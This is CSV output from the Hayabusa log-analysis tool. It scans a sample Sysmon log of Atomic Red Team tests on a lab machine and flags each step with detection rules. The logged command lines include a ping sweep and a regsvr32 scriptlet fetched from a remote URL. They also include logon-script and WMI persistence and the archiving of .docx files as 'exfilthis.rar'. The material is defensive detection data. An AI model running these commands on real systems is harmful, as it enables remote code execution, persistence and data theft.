2019-07-19 23:53:36.025 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.243 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3788 | PGUID: 747F3D96-D970-5D31-0000-0010B4923700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:36.536 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.244 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 7072 | PGUID: 747F3D96-D970-5D31-0000-0010A0953700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:37.012 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.245 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2700 | PGUID: 747F3D96-D971-5D31-0000-00108C983700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:37.505 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.246 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 352 | PGUID: 747F3D96-D971-5D31-0000-0010789B3700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:38.043 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.247 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3120 | PGUID: 747F3D96-D972-5D31-0000-00106BA43700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:38.588 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.248 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6976 | PGUID: 747F3D96-D972-5D31-0000-001057A73700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:39.024 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.249 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2440 | PGUID: 747F3D96-D973-5D31-0000-0010A3AA3700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:39.518 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.250 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5100 | PGUID: 747F3D96-D973-5D31-0000-00108FAD3700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:40.006 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.251 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 7144 | PGUID: 747F3D96-D974-5D31-0000-00107BB03700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:40.535 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.252 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5612 | PGUID: 747F3D96-D974-5D31-0000-001068B33700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:40.982 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.253 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 196 | PGUID: 747F3D96-D974-5D31-0000-001006BD3700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:41.530 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.254 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1624 | PGUID: 747F3D96-D975-5D31-0000-001099C23700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:42.061 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6412 | PGUID: 747F3D96-D976-5D31-0000-00104AC63700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:42.276 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""arp -a"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6292 | PGUID: 747F3D96-D976-5D31-0000-0010DBCC3700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:42.276 +09:00,MSEDGEWIN10,1,low,Disc,Suspicious Network Command,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_network_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:42.301 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: arp -a | Process: C:\Windows\System32\ARP.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""arp -a"" | LID: 0x50951 | PID: 1340 | PGUID: 747F3D96-D976-5D31-0000-001034CF3700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:42.404 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6312 | PGUID: 747F3D96-D976-5D31-0000-0010D8D53700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:42.815 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""regsvr32.exe /s /u /i:C:\AtomicRedTeam\atomics\T1117\RegSvr32.sct scrobj.dll"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4444 | PGUID: 747F3D96-D976-5D31-0000-001041E83700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:42.841 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: regsvr32.exe /s /u /i:C:\AtomicRedTeam\atomics\T1117\RegSvr32.sct scrobj.dll | Process: C:\Windows\System32\regsvr32.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""regsvr32.exe /s /u /i:C:\AtomicRedTeam\atomics\T1117\RegSvr32.sct scrobj.dll"" | LID: 0x50951 | PID: 2332 | PGUID: 747F3D96-D976-5D31-0000-001093EA3700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:42.841 +09:00,MSEDGEWIN10,1,high,Evas,Regsvr32 Flags Anomaly,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_regsvr32_flags_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:42.841 +09:00,MSEDGEWIN10,1,high,Evas,Regsvr32 Anomaly,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_regsvr32_anomalies.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:43.445 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\System32\calc.exe"" | Process: C:\Windows\System32\calc.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: regsvr32.exe /s /u /i:C:\AtomicRedTeam\atomics\T1117\RegSvr32.sct scrobj.dll | LID: 0x50951 | PID: 3848 | PGUID: 747F3D96-D977-5D31-0000-00100A0E3800",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:43.574 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 1476 | PGUID: 747F3D96-D977-5D31-0000-0010771B3800",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:44.026 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 2832 | PGUID: 747F3D96-D978-5D31-0000-0010442F3800",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:44.054 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll | Process: C:\Windows\System32\regsvr32.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll"" | LID: 0x50951 | PID: 2076 | PGUID: 747F3D96-D978-5D31-0000-0010EB313800",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:44.054 +09:00,MSEDGEWIN10,1,high,Evas,Regsvr32 Flags Anomaly,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_regsvr32_flags_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:44.054 +09:00,MSEDGEWIN10,1,high,Evas,Regsvr32 Anomaly,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_regsvr32_anomalies.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:45.157 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k LocalService -p -s BthAvctpSvc | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 6152 | PGUID: 747F3D96-D978-5D31-0000-00101E7A3800,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:46.204 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\System32\calc.exe"" | Process: C:\Windows\System32\calc.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll | LID: 0x50951 | PID: 4336 | PGUID: 747F3D96-D97A-5D31-0000-00105DA83800",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:46.565 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 7148 | PGUID: 747F3D96-D97A-5D31-0000-001089BD3800",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:46.589 +09:00,MSEDGEWIN10,3,medium,,Network Connection_Sysmon Alert,Suspicious NetCon | tcp | Src: 10.0.2.15:49728 (MSEDGEWIN10.home) | Dst: 151.101.0.133:443 () | User: MSEDGEWIN10\IEUser | Process: C:\Windows\System32\regsvr32.exe | PID: 2076 | PGUID: 747F3D96-D978-5D31-0000-0010EB313800,../hayabusa-rules/hayabusa/sysmon/alerts/3_NetworkConnection_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:46.589 +09:00,MSEDGEWIN10,3,high,Exec | Evas,Regsvr32 Network Activity,,../hayabusa-rules/sigma/network_connection/sysmon_regsvr32_network_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:46.848 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\syswow64\regsvr32.exe"" /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll | Process: C:\Windows\SysWOW64\regsvr32.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 3564 | PGUID: 747F3D96-D97A-5D31-0000-00109DDC3800",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:46.848 +09:00,MSEDGEWIN10,1,high,Evas,Regsvr32 Anomaly,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_regsvr32_anomalies.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:46.893 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\regsvr32.exe"" /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll | Process: C:\Windows\System32\regsvr32.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 5828 | PGUID: 747F3D96-D97A-5D31-0000-001019DE3800",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:46.893 +09:00,MSEDGEWIN10,1,high,Evas,Regsvr32 Anomaly,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_regsvr32_anomalies.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:46.975 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c IF %%PROCESSOR_ARCHITECTURE%% ==AMD64 ELSE | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4628 | PGUID: 747F3D96-D97A-5D31-0000-00102BE33800",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:47.083 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll | Process: C:\Windows\SysWOW64\regsvr32.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\regsvr32.exe"" /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll | LID: 0x50951 | PID: 5788 | PGUID: 747F3D96-D97B-5D31-0000-00109DEB3800",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:47.239 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6888 | PGUID: 747F3D96-D97B-5D31-0000-0010F0F03800",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:54.976 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""REG.exe ADD HKCU\Environment /v UserInitMprLogonScript /t REG_MULTI_SZ /d "" cmd.exe | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4240 | PGUID: 747F3D96-D982-5D31-0000-0010DC633900",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:54.976 +09:00,MSEDGEWIN10,1,high,Persis,Logon Scripts (UserInitMprLogonScript),,../hayabusa-rules/sigma/process_creation/proc_creation_win_logon_scripts_userinitmprlogonscript_proc.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:55.018 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: REG.exe ADD HKCU\Environment /v UserInitMprLogonScript /t REG_MULTI_SZ /d cmd.exe | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""REG.exe ADD HKCU\Environment /v UserInitMprLogonScript /t REG_MULTI_SZ /d "" cmd.exe | LID: 0x50951 | PID: 3608 | PGUID: 747F3D96-D983-5D31-0000-00102E663900",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:55.018 +09:00,MSEDGEWIN10,1,high,Persis,Logon Scripts (UserInitMprLogonScript),,../hayabusa-rules/sigma/process_creation/proc_creation_win_logon_scripts_userinitmprlogonscript_proc.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:54:01.925 +09:00,MSEDGEWIN10,13,medium,Persis,Common Autorun Keys Modification,,../hayabusa-rules/sigma/registry_event/sysmon_asep_reg_keys_modification_common.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:54:01.925 +09:00,MSEDGEWIN10,13,high,Persis | LatMov,Logon Scripts (UserInitMprLogonScript) Registry,,../hayabusa-rules/sigma/registry_event/sysmon_logon_scripts_userinitmprlogonscript_reg.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:54:01.955 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4944 | PGUID: 747F3D96-D989-5D31-0000-0010FC7B3900",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:54:16.782 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""rar a -r exfilthis.rar *.docx"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 2000 | PGUID: 747F3D96-D998-5D31-0000-001008B43900",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:54:16.830 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 2424 | PGUID: 747F3D96-D998-5D31-0000-00101BB73900",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:54:57.044 +09:00,MSEDGEWIN10,19,info,,WMI Event Filter Activity,"Created | Namespace: ""root\\CimV2"" | Name: ""AtomicRedTeam-WMIPersistence-Example"" | Query: ""SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >= 240 AND TargetInstance.SystemUpTime < 325"" | User: MSEDGEWIN10\IEUser",../hayabusa-rules/hayabusa/sysmon/events/19_WmiEventFilterActivity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:54:58.819 +09:00,MSEDGEWIN10,20,info,,WMI Event Consumer Activity,"Created | Type: Command Line | Name: ""AtomicRedTeam-WMIPersistence-Example"" | Dst: ""C:\\Windows\\System32\\notepad.exe"" | User: MSEDGEWIN10\IEUser",../hayabusa-rules/hayabusa/sysmon/events/20_WmiEventConsumerActivity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:57:02.378 +09:00,MSEDGEWIN10,21,info,,WMI Event Consumer To Filter Activity,"Created | Consumer: ""\\\\.\\ROOT\\subscription:CommandLineEventConsumer.Name=\""AtomicRedTeam-WMIPersistence-Example\"""" | Filter: ""\\\\.\\ROOT\\subscription:__EventFilter.Name=\""AtomicRedTeam-WMIPersistence-Example\""""",../hayabusa-rules/hayabusa/sysmon/events/21_WmiEventConsumerToFilterActivity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:57:02.806 +09:00,MSEDGEWIN10,21,info,,WMI Event Consumer To Filter Activity,"Deleted | Consumer: ""\\\\.\\ROOT\\subscription:CommandLineEventConsumer.Name=\""AtomicRedTeam-WMIPersistence-Example\"""" | Filter: ""\\\\.\\ROOT\\subscription:__EventFilter.Name=\""AtomicRedTeam-WMIPersistence-Example\""""",../hayabusa-rules/hayabusa/sysmon/events/21_WmiEventConsumerToFilterActivity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:57:02.895 +09:00,MSEDGEWIN10,20,info,,WMI Event Consumer Activity,"Deleted | Type: Command Line | Name: ""AtomicRedTeam-WMIPersistence-Example"" | Dst: ""C:\\Windows\\System32\\notepad.exe"" | User: MSEDGEWIN10\IEUser",../hayabusa-rules/hayabusa/sysmon/events/20_WmiEventConsumerActivity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
